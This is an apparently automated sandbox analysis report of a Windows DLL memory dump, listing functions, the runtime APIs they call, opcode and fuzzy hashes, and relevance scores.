Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FindResource
String ID: I$L$`${
API String ID: 1635176832-477734887
Opcode ID: e26abf6306112d713236494a1958e32bf71cb450ddad13eddc019e6f4035a506
Instruction ID: 077a2fe1cc3848d444ec68ba1d156f74d730ebe5541b4b272d1e56d1afc5fddf
Opcode Fuzzy Hash: e26abf6306112d713236494a1958e32bf71cb450ddad13eddc019e6f4035a506
Instruction Fuzzy Hash: 8A712530E046598BDF18CFBCD9542EDFFB1AF89308F0882A8D555EB295D7349A49CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6EA14A48, Relevance: 10.6, APIs: 7, Instructions: 136COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6EA14A8F
___scrt_uninitialize_crt.LIBCMT ref: 6EA14AA9

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 1ce14376fb892ab1085e2b91ff7346a3990b9bd2b82380a6723d3f16915dbfb7
Instruction ID: 76f0675524ad4cb29faca0a92034917b7ac8d2028036a5b06a37ce1c30dedfa4
Opcode Fuzzy Hash: 1ce14376fb892ab1085e2b91ff7346a3990b9bd2b82380a6723d3f16915dbfb7
Instruction Fuzzy Hash: 7841B372D0C625AFDB209FDDC900BEE3AADEB85B5DF158519E414AB240C7304D838B98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA13250, Relevance: 10.6, APIs: 7, Instructions: 131threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA02620: GetTickCount64.KERNEL32 ref: 6EA0262E

GetTickCount64.KERNEL32 ref: 6EA132B2
GetTickCount64.KERNEL32 ref: 6EA132D0
GetTickCount64.KERNEL32 ref: 6EA132E9
GetTickCount64.KERNEL32 ref: 6EA132EB
GetTickCount64.KERNEL32 ref: 6EA132F2
GetTickCount64.KERNEL32 ref: 6EA13310
DisableThreadLibraryCalls.KERNEL32(?,?,?,00000001,?,?,00000001,?,6EA49E00,0000000C,6EA14C4A,?,00000001,?), ref: 6EA13349

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$CallsDisableLibraryThread
String ID:
API String ID: 2118593989-0
Opcode ID: 1e186f8e901a9b501c1d41af5b83ff9f75020b051113644e6cda06275a537147
Instruction ID: ced46534505e8b4ea4fdb88ae110014f959f5719f5d25eba4f17ea9622d79ad8
Opcode Fuzzy Hash: 1e186f8e901a9b501c1d41af5b83ff9f75020b051113644e6cda06275a537147
Instruction Fuzzy Hash: 5051E331D24B04CFDB12EFB8C544799B7B8BF4A354F01861AD886BB201EB71A8C6CB55

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2A0C6, Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2828C: RtlAllocateHeap.NTDLL(00000000,?,?,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?,?), ref: 6EA282BE

_free.LIBCMT ref: 6EA2A1D5
_free.LIBCMT ref: 6EA2A1EC
_free.LIBCMT ref: 6EA2A20B
_free.LIBCMT ref: 6EA2A226
_free.LIBCMT ref: 6EA2A23D

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 0e68280cdfa33275e65a677e7f401a82b643f9d2e8d878f84cc132e51b3f1bf3
Instruction ID: 54160f872560c6440a267ff7bff2020ecabab16834e5469a9de88d65ac416a5c
Opcode Fuzzy Hash: 0e68280cdfa33275e65a677e7f401a82b643f9d2e8d878f84cc132e51b3f1bf3
Instruction Fuzzy Hash: 4B51B332A00705AFD754CFA9DD40AAA77F6FF44324B184979E819EB250E735DD81CB88

Uniqueness

Uniqueness Score: -1.00%

Function 6EA04B50, Relevance: 7.6, APIs: 5, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EA04B86
std::_Lockit::_Lockit.LIBCPMT ref: 6EA04BA6
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA04BC6
std::_Facet_Register.LIBCPMT ref: 6EA04C61
std::_Lockit::~_Lockit.LIBCPMT ref: 6EA04C79

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: dd89cb968dd030719f62b5573ccc66a91e3e05b2b3caaff5beb9810ccae35046
Instruction ID: 4e14690cb8bb300b67f09a4e9562c0b43a74f492bd5a530ca13143723ca19e79
Opcode Fuzzy Hash: dd89cb968dd030719f62b5573ccc66a91e3e05b2b3caaff5beb9810ccae35046
Instruction Fuzzy Hash: EE41DC71A08614CFCB51DFD8D480BAABBB5FB50B18F14855DD816AF381DB31AD86CB88

Uniqueness

Uniqueness Score: -1.00%

Function 6EA14AF8, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6EA14B35
dllmain_crt_dispatch.LIBCMT ref: 6EA14B4C
dllmain_raw.LIBCMT ref: 6EA14B94
dllmain_crt_dispatch.LIBCMT ref: 6EA14BA7
dllmain_raw.LIBCMT ref: 6EA14BBA

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 136aca5d624b131f52e6e301c47951aa315d8c2fbcd8430801628292002344f1
Instruction ID: ec59c557ad9e2660d4d1c77335ca583f8c71dd47e5568feb698a04ec73dcdfc6
Opcode Fuzzy Hash: 136aca5d624b131f52e6e301c47951aa315d8c2fbcd8430801628292002344f1
Instruction Fuzzy Hash: BA219175D0D629AFDB615F9DCD40FEF3A6DEB84A9CB054415F814AB214C3308D838B94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA01EB0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6EA01EDB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6EA01F2A

Part of subcall function 6EA15592: _Yarn.LIBCPMT ref: 6EA155B1
Part of subcall function 6EA15592: _Yarn.LIBCPMT ref: 6EA155D5

Strings

bad locale name, xrefs: 6EA01F46

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: c5bf5625580d68288714d840463acfda81a6d2f04982f475904e7b159d93dd7f
Instruction ID: 6745fe101ceed3e063e9a8d1c901bc8c1572f19e3c8ba55b5c154ad3832484b2
Opcode Fuzzy Hash: c5bf5625580d68288714d840463acfda81a6d2f04982f475904e7b159d93dd7f
Instruction Fuzzy Hash: 37119E71508B44DFD320CFA9C900B87BBE8EB19614F008A5EE49AC7B40E775A5088B99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA25C2B, Relevance: 4.6, APIs: 3, Instructions: 143COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2897C: GetLastError.KERNEL32(00000000,00000000,00000004,6EA1B7B1,00000000,00000000,00000000,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28981
Part of subcall function 6EA2897C: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA28A1F

_free.LIBCMT ref: 6EA25CDC
_free.LIBCMT ref: 6EA25D0A
_free.LIBCMT ref: 6EA25D52

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 9eba0f3d9e90817e6c8019179ad7f57bde3ac5a1cd902ef85f005c802d2b7479
Instruction ID: 655aeaeeb9eb8f068f8f310b562c1e022436a12b74ef60ff9687bf31f080d25e
Opcode Fuzzy Hash: 9eba0f3d9e90817e6c8019179ad7f57bde3ac5a1cd902ef85f005c802d2b7479
Instruction Fuzzy Hash: D4419B316041029FD754CFECC984AA9B7E8FF49314B2C0979E864E7295E731EC909B45

Uniqueness

Uniqueness Score: -1.00%

Function 6EA25D91, Relevance: 4.6, APIs: 3, Instructions: 97COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6EA25DBD
__cftoe.LIBCMT ref: 6EA25DEF
_free.LIBCMT ref: 6EA25E15

Part of subcall function 6EA1D611: IsProcessorFeaturePresent.KERNEL32(00000017,6EA1D5E3,?,?,6EA01717,?,00000000,00000016,?,6EA1D5F0,00000000,00000000,00000000,00000000,00000000,6EA28169), ref: 6EA1D613
Part of subcall function 6EA1D611: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 6EA1D636
Part of subcall function 6EA1D611: TerminateProcess.KERNEL32(00000000), ref: 6EA1D63D

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process__cftoe$CurrentFeaturePresentProcessorTerminate_free
String ID:
API String ID: 3294049834-0
Opcode ID: bd1351bc3aac6ac24c70b19d714462bb54f4db354dba4f0df5ad60f916a77e33
Instruction ID: c2884e2ae6640f033e747295ce50b10ee1c0b9112814f1ffd3a92ab5d51775be
Opcode Fuzzy Hash: bd1351bc3aac6ac24c70b19d714462bb54f4db354dba4f0df5ad60f916a77e33
Instruction Fuzzy Hash: 6E21C9328041097EDF109AD59D41EDF77ACEF85220F284576F924F5144EB35CE918AAA

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2647D, Relevance: 3.1, APIs: 2, Instructions: 112COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EA2650A
_free.LIBCMT ref: 6EA26530

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 74437f042a5548ab305ceee08ce59f3b7903854cb3a9d589931b6293d5314c77
Instruction ID: 7d84cb49e822f27a467f06889b32379d36b022dc43708be2710e567f27032f61
Opcode Fuzzy Hash: 74437f042a5548ab305ceee08ce59f3b7903854cb3a9d589931b6293d5314c77
Instruction Fuzzy Hash: 9631FC71A156019FD7109EB89D40B563399ABC1728F1C4A35E914EF7C8D375DCC38B48

Uniqueness

Uniqueness Score: -1.00%

Function 6EA14941, Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6EA1498E

Part of subcall function 6EA1508F: InitializeSListHead.KERNEL32(6EA4D898,6EA14998,6EA49DB8,00000010,6EA14929,?,?,?,6EA14B51,?,00000001,?,?,00000001,?,6EA49E00), ref: 6EA15094

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EA149F8

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: e9a60d13effbb71d00e1acdda94b279f57e785962d38e3ab161b128f43842bd3
Instruction ID: a6b66f1e7c0895ee4c89fa6b7f0452327291c963bb3cf17b5b1e2c84ee70335b
Opcode Fuzzy Hash: e9a60d13effbb71d00e1acdda94b279f57e785962d38e3ab161b128f43842bd3
Instruction Fuzzy Hash: 8521D53164C7219EDF10ABFC96147DC37A9AF0636DF294819D451BB1C1DB6244C3C69E

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2A9D0, Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 6EA2AA1C
GetFileType.KERNELBASE(00000000), ref: 6EA2AA2E

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 3649583d0b11e45bfb524857ea0c5b6382ee53d3091e637811a1fe095099a9c4
Instruction ID: a35709d98836279bedf396f115984aa326310a6ea92bf2a5b188a023576aaed3
Opcode Fuzzy Hash: 3649583d0b11e45bfb524857ea0c5b6382ee53d3091e637811a1fe095099a9c4
Instruction Fuzzy Hash: 4A11D271204B528ECB704EBE8E946167A97AF57234B3C472AD0B6F61F1C230C8C2C658

Uniqueness

Uniqueness Score: -1.00%

Function 6EA16D17, Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(?,?,6EA15637,6EA1567D), ref: 6EA16D2A
IsProcessorFeaturePresent.KERNEL32(00000017,6EA28A38,?,6EA2D694,00000000,00000000,?,00F03A88,00000000), ref: 6EA27AF5

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodeFeaturePointerPresentProcessor
String ID:
API String ID: 4030241255-0
Opcode ID: bedb885b3935cf6c0c6195099edf250a2e51cf3677f2b661f1786ced80ff8f35
Instruction ID: ecdf1e93da03a4a31d80b41a51705a6e1ed2a2ebc090c904008e6fe81e8b100f
Opcode Fuzzy Hash: bedb885b3935cf6c0c6195099edf250a2e51cf3677f2b661f1786ced80ff8f35
Instruction Fuzzy Hash: 0CF0BB70248706DEFF156BE09D19B653658AB42758F094434B60D7E0D1DF638582CA5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA253B5, Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2C8EF: GetEnvironmentStringsW.KERNEL32 ref: 6EA2C8F8
Part of subcall function 6EA2C8EF: _free.LIBCMT ref: 6EA2C957
Part of subcall function 6EA2C8EF: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EA2C966

_free.LIBCMT ref: 6EA253F5
_free.LIBCMT ref: 6EA253FC

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 816e4e0efc148e0b3b283918471fba5c9777a90ae18a4ce032e72124f8b76584
Instruction ID: 7646c03abee9bb64d215276a99353d41e2bd596a79ed093381c4750dcb4dc128
Opcode Fuzzy Hash: 816e4e0efc148e0b3b283918471fba5c9777a90ae18a4ce032e72124f8b76584
Instruction Fuzzy Hash: 84E0EC22D49D104D935236EE6C1069916597F82338B1D8A36E530FA0C9DBD4C4C2495F

Uniqueness

Uniqueness Score: -1.00%

Function 6EA35176, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2B406: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EA28B1E,00000001,00000364,00000008,000000FF,?,6EA17EB3,?,?,24448D6E,00000000), ref: 6EA2B447

_free.LIBCMT ref: 6EA351E5

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 169a826882dc893e49ad03a19db963688ded5f4b7154eebc68c37dbe46072aa5
Instruction ID: d9c20a620c52eaf28e0343aedcc49f6de13db56988b9465065bd720d5fca9c65
Opcode Fuzzy Hash: 169a826882dc893e49ad03a19db963688ded5f4b7154eebc68c37dbe46072aa5
Instruction Fuzzy Hash: F4012672A04326AFC3218FDDD880999FBADFB05370F14066AE458B76C0E770AD5087A8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA1419F, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6EA0181E

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 8c6ac696b895073ebc8e4a38ebf12487750d912ebe7ef3a1f15ed8de66e97de4
Instruction ID: 6a2f6bd4f957bf91294334e0b952a115b0da5c897b38fa8bb3e4df33efe1fb29
Opcode Fuzzy Hash: 8c6ac696b895073ebc8e4a38ebf12487750d912ebe7ef3a1f15ed8de66e97de4
Instruction Fuzzy Hash: 9A014E7540421D6BDB009BDCDC008C9779C9F1125CB148635F514E7540E730E5C187DC

Uniqueness

Uniqueness Score: -1.00%

Function 6EA29827, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6EA2B406: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EA28B1E,00000001,00000364,00000008,000000FF,?,6EA17EB3,?,?,24448D6E,00000000), ref: 6EA2B447

_free.LIBCMT ref: 6EA29847

Part of subcall function 6EA28252: HeapFree.KERNEL32(00000000,00000000,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?), ref: 6EA28268
Part of subcall function 6EA28252: GetLastError.KERNEL32(?,?,6EA33A72,?,00000000,?,?,?,6EA33D17,?,00000007,?,?,6EA31D29,?,?), ref: 6EA2827A

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: e65bab35d9fabe05480c17a70acb5d4b7ec6b6849b6467fb406972976eea7665
Instruction ID: 36895532cccab287ef193aed21e2377ce3a5ead7359dfed6602a6c40fb1f830c
Opcode Fuzzy Hash: e65bab35d9fabe05480c17a70acb5d4b7ec6b6849b6467fb406972976eea7665
Instruction Fuzzy Hash: 51014C72D00219AFCB00CFA8C980ADEBBB8FF48710F044666E924E7240E734AA50CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2B406, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6EA28B1E,00000001,00000364,00000008,000000FF,?,6EA17EB3,?,?,24448D6E,00000000), ref: 6EA2B447

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 83d0d156f553266d0e8fa0a037c8f178dc81385a56ea4182a4b82bb95c03b637
Instruction ID: 861705d3a2e3e8be6e45b3e70f80ee6c0d00a0197a6a6655879f445b98cc7330
Opcode Fuzzy Hash: 83d0d156f553266d0e8fa0a037c8f178dc81385a56ea4182a4b82bb95c03b637
Instruction Fuzzy Hash: 2DF02B31D419265FEB114AE6894574637489F41364B1CC631D814FA188CB30D88142EC

Uniqueness

Uniqueness Score: -1.00%

Function 6EA2828C, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,6EA17EB3,?,?,24448D6E,00000000,?,6EA01717,?,?,?), ref: 6EA282BE

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ce71401d4a8956246354958af68a897a26fde9ba11cba8961f9cfed67670ad17
Instruction ID: 601db5c49c22461d313068bcd3e783c10c37b9e5685e15106d506c2b9276f544
Opcode Fuzzy Hash: ce71401d4a8956246354958af68a897a26fde9ba11cba8961f9cfed67670ad17
Instruction Fuzzy Hash: 5AE03931245E229EEA5116EA8E04B9A7A4D9F523B1B1E0530B936BA180CB64C88183ED

Uniqueness

Uniqueness Score: -1.00%

Function 6EA15B63, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 6EA15B8B

Part of subcall function 6EA15492: std::_Lockit::_Lockit.LIBCPMT ref: 6EA154A4
Part of subcall function 6EA15492: std::locale::_Setgloballocale.LIBCPMT ref: 6EA154BF
Part of subcall function 6EA15492: _Yarn.LIBCPMT ref: 6EA154D5
Part of subcall function 6EA15492: std::_Lockit::~_Lockit.LIBCPMT ref: 6EA15515

Memory Dump Source

Source File: 00000001.00000002.622323827.000000006EA01000.00000020.00020000.sdmp, Offset: 6EA00000, based on PE: true

Associated: 00000001.00000002.622320278.000000006EA00000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622348727.000000006EA3A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.622358738.000000006EA4C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.622366010.000000006EA4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 238635018-0
Opcode ID: 0a994ad8ad67722d8cd34b8c00e897db3559b98471f7cbd145fd262fba5daf8d
Instruction ID: 804ab19b98a7bfc6a182ceb34f47244e7c302b8518905d72269e349fc5f6f567
Opcode Fuzzy Hash: 0a994ad8ad67722d8cd34b8c00e897db3559b98471f7cbd145fd262fba5daf8d
Instruction Fuzzy Hash: 0CE0DFB2A0D6319AD3105BE886113DDA29A6B40B15F748809E400DF6C0DFB04C81838D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EA09380, Relevance: 65.6, APIs: 28, Strings: 9, Instructions: 875memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 6EA094EB
VariantInit.OLEAUT32(?), ref: 6EA0951A
VariantCopy.OLEAUT32(?,?), ref: 6EA0952B
SysFreeString.OLEAUT32(00000000), ref: 6EA09578
SysFreeString.OLEAUT32(-00000001), ref: 6EA09620
SysFreeString.OLEAUT32(00000000), ref: 6EA09698
SysFreeString.OLEAUT32(FFFFFFFE), ref: 6EA09735
SysFreeString.OLEAUT32(00000000), ref: 6EA097AD
SysFreeString.OLEAUT32(FFFFFFFE), ref: 6EA0984A
SysFreeString.OLEAUT32(00000000), ref: 6EA098C2
SysFreeString.OLEAUT32(-00000001), ref: 6EA09959
SysFreeString.OLEAUT32(00000000), ref: 6EA099D1
SysFreeString.OLEAUT32(?), ref: 6EA09A71
VariantClear.OLEAUT32(?), ref: 6EA09AAD
SysFreeString.OLEAUT32(-00000001), ref: 6EA09AC5

Part of subcall function 6EA07ED0: SysAllocString.OLEAUT32(?), ref: 6EA07F46

SysFreeString.OLEAUT32(00000000), ref: 6EA09B00

Part of subcall function 6EA07ED0: VariantInit.OLEAUT32(?), ref: 6EA07F78
Part of subcall function 6EA07ED0: VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 6EA07FA0
Part of subcall function 6EA07ED0: SysFreeString.OLEAUT32(-00000001), ref: 6EA07FE1
Part of subcall function 6EA07ED0: SysAllocString.OLEAUT32(?), ref: 6EA08049
